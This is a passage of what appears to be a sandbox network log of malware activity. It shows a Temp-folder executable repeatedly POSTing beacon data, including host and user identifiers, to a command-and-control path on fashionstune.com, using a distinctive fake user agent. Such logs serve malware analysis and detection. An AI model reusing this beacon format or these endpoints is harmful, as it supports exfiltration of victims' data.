May 3, 2018 10:13:21.253159046 CEST	29	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:20 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.1.16	49226	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:21.494038105 CEST	30	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:21.494626999 CEST	30	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:21.891926050 CEST	31	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:21 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.1.16	49228	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:22.126503944 CEST	32	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:22.126713037 CEST	32	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:22.529704094 CEST	32	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:21 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.1.16	49230	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:22.901793957 CEST	33	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:22.902054071 CEST	33	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:23.313555956 CEST	34	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:22 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.1.16	49231	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:23.605835915 CEST	35	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:23.607117891 CEST	35	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:24.027005911 CEST	36	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:23 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.1.16	49233	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:24.252295971 CEST	37	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:24.252445936 CEST	37	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:24.670557976 CEST	38	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:24 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.1.16	49235	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:24.908504009 CEST	39	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:24.908679962 CEST	39	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:25.325048923 CEST	40	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:24 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.1.16	49236	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:25.617537975 CEST	41	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:25.619164944 CEST	41	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:26.028583050 CEST	42	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:25 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.1.16	49239	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:26.331306934 CEST	43	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:26.331573963 CEST	43	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:26.747256041 CEST	43	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:26 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.1.16	49190	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:12:08.024533987 CEST	3	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:12:08.024674892 CEST	3	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:12:08.471345901 CEST	4	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:12:07 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.1.16	49240	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:27.041217089 CEST	44	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:27.043303013 CEST	44	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:27.919224977 CEST	45	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:27 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.1.16	49242	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:28.218209982 CEST	47	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:28.218419075 CEST	47	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:28.638801098 CEST	47	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:28 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.1.16	49243	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:28.932188988 CEST	48	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:28.932378054 CEST	48	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:29.397347927 CEST	49	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:28 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.1.16	49246	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:29.746505976 CEST	50	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:29.747193098 CEST	50	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:30.249497890 CEST	52	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:29 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.1.16	49248	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:30.630881071 CEST	52	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:30.631962061 CEST	53	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:31.047708035 CEST	53	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:30 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.1.16	49249	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:31.294576883 CEST	54	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:31.295552969 CEST	54	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:31.711811066 CEST	54	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:31 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.1.16	49250	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:31.971503973 CEST	55	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:31.973048925 CEST	56	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:32.436606884 CEST	57	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:31 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.1.16	49253	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:32.702934027 CEST	58	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:32.703063011 CEST	58	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:33.168447971 CEST	58	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:32 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.1.16	49191	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:12:08.991966963 CEST	4	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:12:08.992121935 CEST	5	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:12:09.420301914 CEST	5	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:12:08 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.1.16	49192	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:12:10.756988049 CEST	6	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:12:10.757178068 CEST	6	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:12:11.175081968 CEST	6	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:12:10 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.1.16	49193	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:12:11.876214981 CEST	7	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:12:11.876416922 CEST	8	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:12:12.302556992 CEST	8	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:12:11 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.1.16	49194	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:12:12.597477913 CEST	9	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:12:12.597613096 CEST	9	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:12:13.015059948 CEST	9	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:12:12 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.1.16	49196	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
